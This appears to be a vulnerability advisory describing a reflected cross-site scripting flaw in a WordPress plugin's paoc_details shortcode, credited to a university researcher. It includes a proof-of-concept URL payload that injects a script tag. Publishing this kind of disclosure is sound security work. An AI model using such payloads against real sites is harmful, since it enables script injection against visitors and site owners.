The plugin does not sanitise and escape a parameter before outputting it back in a frontend page, leading to a Reflected Cross-Site Scripting
On a post/page where the [paoc_details display="key_xxx"] shortcode is embed, append the following payload: ?xxx=11111%3Cscript%3Ealert(/XSS/)%3C/script%3E e.g: https://example.com/2022/06/10/hello/?xxx=11111%3Cscript%3Ealert(/XSS/)%3C/script%3E
ZhongFu Su(JrXnm) of WuHan University
ZhongFu Su(JrXnm) of WuHan University
Yes
2022-07-04 (about 1 months ago)
2022-07-04 (about 1 months ago)
2022-07-04 (about 1 months ago)